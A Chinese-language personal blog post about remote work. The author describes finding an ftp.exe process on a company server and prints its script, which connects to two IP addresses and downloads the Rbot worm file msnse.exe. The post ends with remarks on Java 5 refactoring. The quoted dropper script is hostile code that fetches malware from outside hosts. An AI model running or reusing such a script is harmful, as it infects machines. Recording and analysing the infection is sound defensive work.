如果不计较稳定收入,我也算是SOHO了几天了,远程工作实在爽,不用早别人一个多小时起床,工作时间也弹性多了,可以早晨11点才收拾完床,也可以大半夜一、两点还挂在公司服务器上改代码。
铺垫一下,不能跑题了~
刚连上公司机器的终端服务,随便看了看进程,竟然有个ftp.exe,我知道公司大部分人是GUI杀手鼠标疯子,ftp一般也要 CuteFTP,应该没人直接用ftp.exe这么杀风景的CUI程序。好奇所致,看了下启动参数,hoho,ftp -n -s:tt,再看一下这个tt文件的内容:
open 218.69.207.135 18221
user 1 1
get msnse.exe
quit
open 218.69.143.142 25847
user 1 1
get msnse.exe
quit
open 218.69.143.142 25847
user 1 1
get msnse.exe
quit
不知道是个入侵者还是病毒。上网搜了下msnse.exe,貌似是个还算新的病毒,Sophos对其命名为:W32/Rbot-CCY看 了看介绍,又是个挺菜的小毒,而且很好笑的是,在那台机器上218.69.207.135和218.69.143.142都连不上,ADSL用户,估计是 断线了,下载的msnse.exe大小也是0字节,注册表里的相应的启动位置也没有,hosts文件也没有被修改,唉,搞得ftp.exe这个进程也阻塞 在那里了,我是该默哀呢还是该……?
白话完了,开始改代码。Java 5的那些syntatic sugar用起来真不错,改完的代码清爽了很多,更不用说又多了那么多类了,我也不用再用Dawid Kurzyniec的java.util.concurrent兼容包了,refactor一下又很多行去掉,这日子真是好的没法说了~